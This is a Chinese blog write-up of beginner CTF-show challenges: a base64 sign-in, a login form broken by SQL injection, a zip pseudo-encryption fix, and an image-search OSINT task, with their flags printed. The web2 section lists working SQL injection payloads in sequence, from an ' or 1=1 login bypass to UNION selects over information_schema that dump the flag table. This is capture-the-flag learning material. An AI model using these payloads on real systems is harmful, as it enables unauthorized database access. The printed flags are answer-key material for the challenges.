CTF-show
WEB板块
web签到题
查看源码
base64解码
1 | ctfshow{6d8d8144-c200-4f8e-801c-23b7a1cd2403} |
web2
用户名输入
1 | ' or 1=1 -- a //成功登录 |
判断字段数
1 | ' or 1=1 order by 3 -- a //页面正常 |
判断回显位
构造
1 | 'or 1=2 union select 1,2,3 -- a //页面出现2,数字2处为回显位 |
爆库名
构造
1 | 'or 1=2 union select 1,database(),3 -- a' |
爆表名
构造
1 | 'or 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 -- a' //爆出flag表 |
爆字段
构造
1 | or 1=2 union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1 -- a' //爆出flag字段 |
看内容
构造
1 | 'or 1=2 union select 1,flag,3 from flag limit 0,1 -- a' |
ctfshow{1a5480d6-f6a8-4787-85fc-a2382f9ac937}
web3
不会,先放着
web316
Misc板块
杂项签到
用010 Editor打开,发现是伪加密,将09改为00
然后就能正常打开了
1 | flag{79ddfa61bda03defa7bfd8d702a656e4} |
网络迷踪板块
新手上路
附件一张.jpg图片,题目说flag为桥的名字
百度识图找到桥所在的岛的名字
百度搜出桥的名字
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Yliken!